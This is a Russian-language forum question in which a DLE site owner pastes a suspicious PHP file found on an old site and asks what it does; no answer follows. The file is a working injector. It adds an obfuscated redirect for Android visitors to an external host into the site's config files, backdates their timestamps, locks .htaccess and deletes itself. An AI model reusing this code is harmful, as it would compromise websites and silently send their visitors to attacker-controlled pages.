Не нравятся результаты поиска? Попробуйте другой поиск!

Что это за вирус?


     22.05.2015    Ламерские вопросы    916

вопрос
В продолжении темы которую для чего-то снесли.
Нашёл на одном из старых сайтов - он висит в отключенном состоянии уже года три, а то и больше гадость engine/data/images.php
<?php
$times = filemtime($_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php');
$con = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php');
$con = str_replace('<?php', '<?php
$gant = strtolower($_SERVER[strrev(strtoupper(\'tnega_resu_ptth\'))]);$ref = $_SERVER[strrev(strtoupper(\'tsoh_ptth\'))];
if(!preg_match(\'/crawl|andex|oogle|bot/i\',$gant)) {
if((preg_match(\'/ndroi|htc_|htc-/i\',$gant)) and (!isset ($_COOKIE[\'dle_user_id\'])) and($_SERVER[\'REQUEST_URI\'] != \'/\'))
{header(strrev(\'=REREFER_PTTH&1=ru&lmth.11\'.\'/67namyrros/\'.\'stneilc\'.\'/ten.\'.\'slm\'.\'thx\'.\'//:pt\'.\'th :noi\'.\'tac\'.\'oL\').$ref);exit;}}
', $con);
$con = file_put_contents($_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php', $con);
touch($_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php', $times);
$con = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/engine/data/config.php');
$con = str_replace('<?php', '<?php
$gant = strtolower($_SERVER[strrev(strtoupper(\'tnega_resu_ptth\'))]);$ref = $_SERVER[strrev(strtoupper(\'tsoh_ptth\'))];
if(!preg_match(\'/crawl|andex|oogle|bot/i\',$gant)) {
if((preg_match(\'/ndroi|htc_|htc-/i\',$gant)) and (!isset ($_COOKIE[\'dle_user_id\'])) and($_SERVER[\'REQUEST_URI\'] != \'/\'))
{header(strrev(\'=REREFER_PTTH&1=ru&lmth.11\'.\'/67namyrros/\'.\'stneilc\'.\'/ten.\'.\'slm\'.\'thx\'.\'//:pt\'.\'th :noi\'.\'tac\'.\'oL\').$ref);exit;}}
', $con);
$con = file_put_contents($_SERVER['DOCUMENT_ROOT'].'/engine/data/config.php', $con);
touch($_SERVER['DOCUMENT_ROOT'].'/engine/data/config.php', $times);
copy($_SERVER['DOCUMENT_ROOT']."/engine/cache/.htaccess", $_SERVER['DOCUMENT_ROOT']."/engine/data/.htaccess");
touch($_SERVER['DOCUMENT_ROOT'].'/engine/data/.htaccess', $times);
chmod($_SERVER['DOCUMENT_ROOT'].'/engine/data/.htaccess', 0444);
if (unlink ("images.php")) print "cleaner";
?>

Он может переписать файлы на другом домене? Вроде как он даже дату изменения файла может затереть.
Что-то мне попадалось такое связанное с этим файлом в версиях 9x
Я не помню какая там версия стояла изначально, возможна даже 8x, но сейчас 10.1, так что может он там лежит уже давно. Могло ли быть такое что он попал туда в старой версии и ломает сайты сейчас? Есть ли логика в том чтобы ломать с помощью него только DLE, а OC, к примеру, не трогать?

Ответа пока нет


Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы